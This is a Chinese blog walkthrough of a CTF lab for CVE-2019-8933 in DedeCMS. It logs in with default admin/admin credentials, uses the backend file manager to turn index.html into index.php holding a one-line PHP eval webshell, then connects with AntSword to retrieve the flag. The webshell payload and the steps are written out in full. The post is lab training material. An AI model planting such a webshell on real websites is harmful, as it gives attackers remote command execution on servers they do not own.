春秋云境CVE-2019-8933

1.阅读靶场介绍

这里我们能得到的信息就是

将文件名../index.html更改成../index.php应用该漏洞向uploads/目录上传.php文件并执行该文件。

简单来说就是在后台把index.html的文件改为index.php并且修改内容为

<?php @eval($_POST['cmd']);?>

然后就可以完成webshell了

2.启动靶场

如下图所示

博主这里是把靶场介绍喂给ai得到的后台路径

直接在路径拼接/dede这个就会跳转到登入页面

如下图所示

账号/密码是admin/admin

进入后台以后我们点击这个文件式管理器

右边有一个index.html我们点击编辑

会出现下述页面

这里要修改一下文件名称和内容

index.php

<?php @eval($_POST['cmd']);?>

保存即可

然后访问

出现一片空白的就是对的

下面这个是url

https://eci-2ze1zd9kizhz7f10jpim.cloudeci1.ichunqiu.com/uploads/index.php

最后就是启动中国蚁剑

输入url和木马的密码

我们就可以完成webshell了

这里我们就可以找到flag

感谢您宝贵的时间

喜欢博主的作品可以点赞支持支持哟

相关推荐
m0_738120721 小时前
渗透基础知识ctfshow——Web应用安全与防护(完结:第八章)
前端·python·sql·安全·web安全·网络安全
ん贤2 小时前
如何设计一个灵活、高效、安全的 AI 工具系统
人工智能·安全·go
他是龙5512 小时前
66:Java安全&SPEL表达式&SSTI模版注入&XXE&JDBC&MyBatis注入
java·安全·mybatis
上海控安2 小时前
汽车数字钥匙安全风险及渗透实践解析
网络·安全
renhongxia12 小时前
从内部进行大型语言模型安全
大数据·人工智能·安全·语言模型·自然语言处理·逻辑回归
shanna_succeed2 小时前
一张证卡,连接实验室安全的每一个关键节点
安全
每日综合2 小时前
Web3 多链时代,安全与体验如何兼得?UKey Wallet 的“解题思路”
安全·web3·区块链
成为你的宁宁2 小时前
【Kubernetes Secret 安全配置指南:从创建配置到环境变量、数据卷使用及私有镜像仓库实践】
java·安全·kubernetes
ZKNOW甄知科技2 小时前
燕千云ITR深度解析:大型企业如何建立服务价值流?
运维·人工智能·后端·科技·安全·自动化·用户运营